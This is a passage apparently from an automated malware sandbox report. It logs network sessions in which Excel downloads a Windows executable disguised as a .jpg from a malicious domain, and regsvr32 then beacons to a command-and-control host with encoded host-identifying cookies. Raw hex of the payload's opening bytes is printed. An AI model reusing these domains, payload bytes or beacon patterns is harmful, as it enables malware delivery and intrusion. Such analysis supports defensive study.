                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 4569
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d%2BaXch2L3fd900zKjzyYSRfC9hQVPWG3n4OZYVEj39RvIOnQ1%2Fa8iGrhk9uRSqSlCiC1SigaLdQfqr0oQ0gBrEPc4nhFAbBdmpUQpqqW7Ea51Pqhc0o5X6y1jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a915898a8f4e2b-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766771078 CEST66INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: @@
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766784906 CEST67INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                                  Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766797066 CEST68INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                  Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766809940 CEST70INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                                  Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766825914 CEST71INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                                  Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766844988 CEST72INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                                  Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766865015 CEST74INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                  Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766880035 CEST75INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                  Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766896009 CEST77INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                  Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.768251896 CEST78INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                  Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  2192.168.2.2249167104.21.55.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.932414055 CEST125OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                  Host: uppercilio.fun
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996679068 CEST126INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:20 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 57856
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 4568
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TcxOBI3LE7hks3UaLOzUCmei%2B3AhO5N50KzVCQZzFU1dHMyrurpRjRiizcjGmU0Vvk2hCVFbxSnz%2FlI9j7iM2llIWQNg49350wtmQZK7MwLZo2PMqLP68%2BaJ5mQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a9158b08f1177a-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996710062 CEST128INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: @@
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996722937 CEST129INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                                  Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996737957 CEST130INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                  Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996756077 CEST132INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                                  Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996773958 CEST133INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                                  Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996788979 CEST134INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                                  Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996804953 CEST136INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                  Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996820927 CEST137INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                  Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996836901 CEST139INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                  Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.997889996 CEST140INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                  Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  3192.168.2.2249169172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.927584887 CEST445OUTGET / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: __gads=3565085024:1:4650:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383635374239393136433034454441; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                  Host: astrocycle.download
                                                                                                                                                                                                  Jul 6, 2021 15:12:24.448312044 CEST446INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:24 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eqVDpeP3%2FQWy91%2BnROpUr1zFbLOABWy3KxvIavdHrlVsvVafuJbIVzkMZyh5BR6WYn0mKLNptc2rXflmcrwvcPIeU1Dl6F5jJb5%2F5TDBK2ouFaIhUMxIOfZz6pAcN8WJTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a9159dbd54bef6-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                  Jul 6, 2021 15:12:24.448345900 CEST446INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  4192.168.2.2249171104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.807413101 CEST706OUTGET / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: __gads=3565085024:1:4654:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:39463738354244374233363041433337; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                  Host: astrocycle.download
                                                                                                                                                                                                  Jul 6, 2021 15:12:28.375191927 CEST707INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:28 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=l8sTPRPr0SR5YsRxyrHtM8gQuISQxKp9yDkj%2F1LMPCGQt7XetGwzm5Yor8njU3lv8MNq5cb9vIUsJpyjzD%2BCgJT8vqs1YUjL1g0Sxq4IPi3rIhgJvte%2FhZbAs0WkhnYGhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a915b5f966c2c7-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                  Jul 6, 2021 15:12:28.375216007 CEST707INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  5192.168.2.2249173104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.292399883 CEST966OUTGET / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: __gads=3565085024:1:4657:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383342324439354536373742443933; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                  Host: astrocycle.download
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803194046 CEST967INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:31 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
